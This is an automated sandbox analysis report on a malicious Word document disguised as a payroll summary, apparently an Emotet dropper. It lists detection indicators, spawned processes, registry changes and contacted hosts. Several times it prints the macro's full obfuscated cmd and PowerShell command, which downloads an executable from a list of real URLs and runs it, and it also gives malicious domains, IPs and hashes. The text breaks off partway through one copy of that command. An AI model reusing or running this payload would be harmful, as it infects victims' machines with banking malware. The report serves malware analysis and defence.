09172 Payroll Summary.doc
This report is generated from a file or URL submitted to this webservice on May 17th 2018 14:52:19 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Uses network protocols on unusual ports
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 1 domain and 3 hosts. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 14
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO TROJAN W32/Emotet CnC Checkin" (SID: 2830701, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 10/57 Antivirus vendors marked sample as malicious (17% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 14/64 Antivirus vendors marked dropped file "57463.exe" as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
- source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
14/64 Antivirus vendors marked spawned process "57463.exe" (PID: 3220) as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
14/64 Antivirus vendors marked spawned process "cmnmspthrd.exe" (PID: 2240) as malicious (classified as "GenKryptik.BMLF" with 21% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"powershell.exe" wrote 32 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
"powershell.exe" wrote 52 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
"powershell.exe" wrote 4 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
"57463.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
"57463.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
"57463.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "138.0.120.12": ...
URL: http://ifcingenieria.cl/76j4qo/76524.exe (AV positives: 2/67 scanned on 05/17/2018 12:45:20)
URL: http://ifcingenieria.cl/76j4qo/ (AV positives: 3/67 scanned on 05/17/2018 11:57:55)
URL: http://vertek.cl/ (AV positives: 1/67 scanned on 04/27/2018 15:47:08)
URL: http://ifcingenieria.cl/ (AV positives: 3/67 scanned on 04/26/2018 10:45:03)
URL: http://ifcingenieria.cl/ni9tsuvgzii (AV positives: 3/67 scanned on 04/25/2018 18:44:00)
File SHA256: 3801181d5eec749898527ebc4279741acbc9f82c8aa72f8be272031d67eea76b (AV positives: 10/59 scanned on 04/25/2018 13:51:22)
File SHA256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0 (AV positives: 10/70 scanned on 04/25/2018 11:56:13)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/56 scanned on 05/19/2017 09:54:38)
File SHA256: a2cad944f3399bde2a5691c14be8b4f939898b5a97dadd579aff3390cdf3624f (AV positives: 1/56 scanned on 07/19/2016 09:29:10) - source
- Network Traffic
- relevance
- 10/10
-
Uses network protocols on unusual ports
- details
- TCP traffic to 81.21.67.85 on port 8080
- source
- Network Traffic
- relevance
- 7/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\09172 Payroll Summary.doc"" (Show Process)
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (Show Process), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "57463.exe" (Show Process), Spawned process "cmnmspthrd.exe" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 13
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "lrqjor@acfarihso2squ.eozmftwzaojzglmgx275315aeb"
Pattern match: "570kmqatvuhjlu@qculdb.8z59uesf7p82066"
Pattern match: "sczcin3c7bopwqupp@51rtqrehb58ot.rddqrbi"
Pattern match: "pe9eldtfifdaex@lnwbyu9odpe9.uyy"
Pattern match: "tn@eilcbetw.ten.mu" - source
- File/Memory
- relevance
- 3/10
-
Found a potential E-Mail address in binary/memory
-
Installation/Persistance
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1308)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
"powershell.exe" is creating a new process (Name: "%PUBLIC%\57463.exe", Handle: 1592)
"57463.exe" is creating a new process (Name: "%WINDIR%\System32\cmnmspthrd.exe", Handle: 464) - source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "57463.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
-
"WINWORD.EXE" opened "\Device\MountPointManager"
"powershell.exe" opened "\Device\MountPointManager"
"57463.exe" opened "\Device\MountPointManager" - source
- API Call
- relevance
- 5/10
-
Creates new processes
-
Network Related
-
Found potential IP address in binary/memory
- details
- "81.21.67.85"
- source
- File/Memory
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"cmnmspthrd.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"cmnmspthrd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"cmnmspthrd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)" - source
- Static Parser
- relevance
- 10/10
-
Executes powershell accessing native variables
- details
-
Process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Indicator: "$pshome"
UID: 00010513-00002408) - source
- Monitored Target
- relevance
- 10/10
-
Extensive usage of escape characters in the commandline
- details
-
Process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00010503-00004016, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= 